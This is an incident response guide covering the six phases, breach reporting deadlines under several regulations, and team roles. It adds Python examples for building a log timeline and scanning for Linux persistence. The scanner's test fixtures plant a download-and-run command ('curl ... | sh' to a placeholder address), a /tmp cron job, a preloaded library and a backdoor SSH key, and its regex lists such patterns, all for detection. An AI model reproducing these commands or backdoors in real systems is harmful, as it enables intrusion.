Why It Matters
Every organization will eventually experience a security incident; the question is when, not if. Organizations with an incident response team and a regularly tested plan contain breaches 54 days faster and save an average of USD 2.66 million compared with those that have neither (IBM Cost of a Data Breach, 2023). A growing number of regulations also mandate formal incident response capabilities, several with fixed reporting deadlines.
The Six Phases (SANS model; NIST SP 800-61 covers the same activities in four phases)
1. Preparation
- Develop and document the incident response plan
- Establish the incident response team (IRT) with clear roles
- Deploy detection tools (SIEM, EDR, IDS)
- Conduct training and tabletop exercises
- Prepare communication templates and contact lists
2. Detection and Analysis
- Monitor alerts from security tools
- Triage and classify incidents by severity
- Determine the scope — what systems, data, and users are affected
- Document the timeline of events
- Decide whether to escalate
3. Containment
- Short-term containment — isolate affected systems (network isolation, account disablement) to stop the spread, without powering them off and losing volatile evidence
- Long-term containment — apply temporary fixes (blocking rules, credential rotation, patched rebuilds) that keep the business running while eradication is prepared
- Preserve evidence for forensic analysis — capture memory, disk images and logs before any reboot or reimage, and record who collected what and when
- Decide on communication strategy
4. Eradication
- Remove the root cause (malware, unauthorized access, vulnerability)
- Patch exploited vulnerabilities
- Reset compromised credentials, including service accounts, API keys and active sessions
- Verify no persistence mechanisms remain (scheduled tasks, services, startup scripts, added SSH keys, injected libraries)
5. Recovery
- Restore systems from backups verified to predate the compromise
- Monitor closely for signs of re-compromise
- Gradually return to normal operations
- Verify data integrity
6. Lessons Learned
- Conduct a post-incident review within 1–2 weeks
- Document what happened, what worked, what didn't
- Update the incident response plan based on findings
- Share relevant intelligence with peers and authorities
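The "document the timeline" and "determine the scope" steps of phase 2, as an added example that is not part of the original page: it merges log lines from three sources with different timestamp formats into one UTC-ordered timeline and summarises the hosts and addresses involved. The auth.log, Apache access log and EDR export lines are constructed for illustration, and the host names, users, addresses and the assumption that the web host's clock runs at UTC+2 are all made up.

```python
"""Added example (not from the original page): merge evidence from several
log sources into one UTC-ordered timeline and summarise scope.  The log
lines below are constructed; hosts, users and addresses are made up."""
import re
from dataclasses import dataclass
from datetime import datetime, timezone, timedelta

# --- constructed sample evidence ------------------------------------------
# Host auth log: syslog format, no year and no zone (this host's clock is UTC+2)
AUTH_LOG = """\
Mar 14 09:12:01 web01 sshd[2231]: Accepted password for deploy from 203.0.113.7 port 51422 ssh2
Mar 14 09:12:05 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash
Mar 14 09:13:40 web01 CRON[2302]: (root) CMD (/tmp/.x/update.sh)
"""
# Web server access log: Apache combined format, timestamp carries its own offset
ACCESS_LOG = """\
203.0.113.7 - - [14/Mar/2024:07:09:55 +0000] "GET /wp-login.php HTTP/1.1" 200 1824
203.0.113.7 - - [14/Mar/2024:07:10:31 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""
# EDR export: CSV with ISO 8601 UTC timestamps
EDR_CSV = """\
2024-03-14T07:13:41Z,web01,process_start,/bin/sh /tmp/.x/update.sh,parent=cron
2024-03-14T07:13:44Z,web01,net_connect,198.51.100.9:443,process=curl
"""


@dataclass(frozen=True, order=True)
class Event:
    ts_utc: datetime      # first field, so sorting Events sorts by time
    source: str
    host: str
    detail: str


SYSLOG_RE = re.compile(r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
                       r"(?P<host>\S+) (?P<detail>.*)$")
APACHE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_syslog(text, host_tz, year):
    """Syslog lines carry neither year nor zone; both come from the host's context."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        local = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                                  "%Y %b %d %H:%M:%S").replace(tzinfo=host_tz)
        events.append(Event(local.astimezone(timezone.utc), "auth.log", m["host"], m["detail"]))
    return events


def parse_apache(text, host):
    """Apache timestamps include an offset, so they convert to UTC directly."""
    events = []
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append(Event(ts.astimezone(timezone.utc), "access.log", host,
                            f'{m["ip"]} "{m["req"]}" {m["status"]}'))
    return events


def parse_edr(text):
    """ISO 8601 with a trailing Z; rewritten to +00:00 for fromisoformat on older Pythons."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, kind, detail, extra = line.split(",", 4)
        when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
        events.append(Event(when, "edr", host, f"{kind} {detail} ({extra})"))
    return events


def build_timeline(*event_lists):
    """Chronological merge of every source into one list."""
    return sorted(e for lst in event_lists for e in lst)


def scope(events):
    """Hosts and IP addresses that appear anywhere in the timeline."""
    hosts = sorted({e.host for e in events})
    ips = sorted({ip for e in events for ip in IP_RE.findall(e.detail)})
    return {"hosts": hosts, "ips": ips}


def sample_timeline():
    """Timeline built from the constructed evidence above (web01 clock assumed UTC+2)."""
    return build_timeline(
        parse_syslog(AUTH_LOG, timezone(timedelta(hours=2)), 2024),
        parse_apache(ACCESS_LOG, "web01"),
        parse_edr(EDR_CSV),
    )


if __name__ == "__main__":
    tl = sample_timeline()
    for e in tl:
        print(f"{e.ts_utc:%Y-%m-%dT%H:%M:%SZ} {e.source:<10} {e.host:<6} {e.detail}")
    print(scope(tl))
```

Once normalised, the order tells the story the raw files hide: the login page was probed and then hit with a POST two minutes before the SSH login, the sudo to root and the cron job in /tmp, and the EDR export corroborates the cron execution and an outbound connection one second later. The year and zone passed to parse_syslog are exactly the kind of assumption that must be written into the incident record, because a wrong offset silently reorders events.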
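The "verify no persistence mechanisms remain" step of phase 4, as an added example that is not code from the original page: it sweeps a filesystem root for the usual Linux persistence points (cron entries, systemd units, /etc/ld.so.preload, SSH authorized_keys) and reports entries that match simple indicators. The sample tree it builds, the key blobs and the addresses in it are constructed; the allow-list of known SSH key blobs is an assumption supplied by the caller, and the indicator list is a starting point rather than a complete catalogue.

```python
"""Added example (not from the original page): sweep a Linux filesystem root
for common persistence mechanisms after eradication.  The sample tree from
build_sample_root() is constructed; key blobs, service names and addresses
are made up."""
import os
import re
import tempfile
from dataclasses import dataclass
from glob import glob

# Indicators that a scheduled command or service deserves a second look:
# executables in world-writable or hidden directories, inline decoding,
# download-and-run pipelines, netcat with -e.
SUSPICIOUS = re.compile(
    r"/tmp/|/dev/shm/|/var/tmp/|/\.[^/\s]+/"
    r"|base64\s+(-d|--decode)"
    r"|(curl|wget)[^|\n]*\|\s*(ba)?sh\b"
    r"|\bnc\b[^\n]*\s-e\s"
)
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")
KNOWN_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIGoodKeyExampleNotARealKey"   # constructed blob


@dataclass
class Finding:
    category: str
    path: str
    evidence: str


def _lines(path):
    """Non-empty, non-comment lines of a file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.strip()
            if line and not line.startswith("#"):
                yield line


def check_cron(root):
    paths = [os.path.join(root, "etc/crontab")]
    paths += glob(os.path.join(root, "etc/cron.d/*"))
    paths += glob(os.path.join(root, "var/spool/cron/crontabs/*"))
    return [Finding("cron", p, l) for p in paths if os.path.isfile(p)
            for l in _lines(p) if SUSPICIOUS.search(l)]


def check_systemd(root):
    paths = glob(os.path.join(root, "etc/systemd/system/*.service"))
    return [Finding("systemd", p, l) for p in paths for l in _lines(p)
            if l.startswith("Exec") and SUSPICIOUS.search(l)]


def check_ld_preload(root):
    # Anything listed here is injected into every dynamically linked process;
    # a healthy host normally has this file absent or empty, so every entry is reported.
    p = os.path.join(root, "etc/ld.so.preload")
    if not os.path.isfile(p):
        return []
    return [Finding("ld.so.preload", p, l) for l in _lines(p)]


def check_authorized_keys(root, allowed_blobs):
    """Report any key whose blob is not in the caller's allow-list (options such as
    command= may precede the key type, so the type token is located first)."""
    paths = glob(os.path.join(root, "root/.ssh/authorized_keys"))
    paths += glob(os.path.join(root, "home/*/.ssh/authorized_keys"))
    findings = []
    for p in paths:
        for line in _lines(p):
            toks = line.split()
            idx = next((i for i, t in enumerate(toks) if t.startswith(KEY_TYPES)), None)
            if idx is None or idx + 1 >= len(toks):
                continue
            if toks[idx + 1] not in allowed_blobs:
                findings.append(Finding("authorized_keys", p, line))
    return findings


def scan_persistence(root, allowed_blobs):
    """All checks over one filesystem root (a mounted image or a live system's /)."""
    return (check_cron(root) + check_systemd(root)
            + check_ld_preload(root) + check_authorized_keys(root, allowed_blobs))


def build_sample_root():
    """Write a constructed post-incident filesystem snapshot into a temp dir."""
    root = tempfile.mkdtemp(prefix="ir-sample-")
    files = {
        "etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup.sh\n",          # benign
        "var/spool/cron/crontabs/root": "*/5 * * * * /tmp/.x/update.sh\n",         # hidden dir in /tmp
        "etc/systemd/system/sshd-helper.service":
            "[Service]\nExecStart=/bin/sh -c 'curl -s http://198.51.100.9/a | sh'\n",  # download-and-run
        "etc/ld.so.preload": "/usr/lib/libx.so\n",                                   # injected library
        "root/.ssh/authorized_keys":
            f"ssh-ed25519 {KNOWN_KEY} admin@bastion\n"
            "command=\"/tmp/.x/shell\" ssh-rsa AAAAB3NzaC1yc2EAAAAFakeAttackerKey attacker\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in scan_persistence(build_sample_root(), {KNOWN_KEY}):
        print(f"[{f.category}] {f.path}: {f.evidence}")
```

Run it against a mounted disk image rather than the live host where possible, since a rootkit on the live system can hide exactly the files being checked. Four findings on the constructed tree and none for the legitimate backup job is the expected result; an empty result on a real host means only that these specific locations are clean, and the indicator list should be extended with whatever the investigation found the attacker actually used.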
Regulatory Reporting Timelines
| Regulation | Deadline | Recipient and trigger |
|---|---|---|
| GDPR (Art. 33 and 34) | 72 hours after becoming aware | Supervisory authority; affected data subjects without undue delay where the breach is likely to result in a high risk to them |
| NIS2 (Art. 23) | 24 hours (early warning), 72 hours (incident notification), 1 month (final report) | Significant incidents, to the national CSIRT or competent authority |
| DORA (Art. 19) | 4 hours after classifying the incident as major and no later than 24 hours after becoming aware (initial), 72 hours (intermediate), 1 month (final) | Major ICT-related incidents, to the financial supervisor |
| CIRCIA | 72 hours for covered cyber incidents, 24 hours after a ransom payment | Covered critical-infrastructure entities, to CISA; applies once CISA's implementing rule is in force |
| HIPAA Breach Notification Rule | Individuals: without unreasonable delay and no later than 60 days after discovery | HHS (and major media) within the same 60 days for breaches affecting 500+ individuals; smaller breaches are logged and reported to HHS annually |
| SEC Reg S-P (2024 amendments) | As soon as practicable, no later than 30 days after becoming aware | Affected individuals, by covered broker-dealers, investment companies and advisers |
| SEC Form 8-K Item 1.05 | 4 business days after determining the incident is material | Investors, by public companies |
Every clock above starts at the moment of awareness or classification, so the time of that determination must itself be recorded in the incident log.
Incident Response Team Roles
- Incident Commander — overall coordination and decision-making
- Technical Lead — forensic analysis, containment, eradication
- Communications Lead — internal and external communications, media
- Legal/Compliance — regulatory notifications, legal obligations, evidence preservation
- Business Liaison — impact assessment, business continuity coordination
- Data Protection Officer (DPO) — data protection implications, supervisory authority and data subject notifications (GDPR)
Key Frameworks
- NIST SP 800-61 — Computer Security Incident Handling Guide (Rev. 2; Rev. 3, 2025, reframes it as a CSF 2.0 community profile)
- ISO/IEC 27035 — Information Security Incident Management
- SANS Incident Handling Process — the six-step PICERL methodology (Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned) that the phases above follow
- ENISA Incident Response Guidelines — EU-specific guidance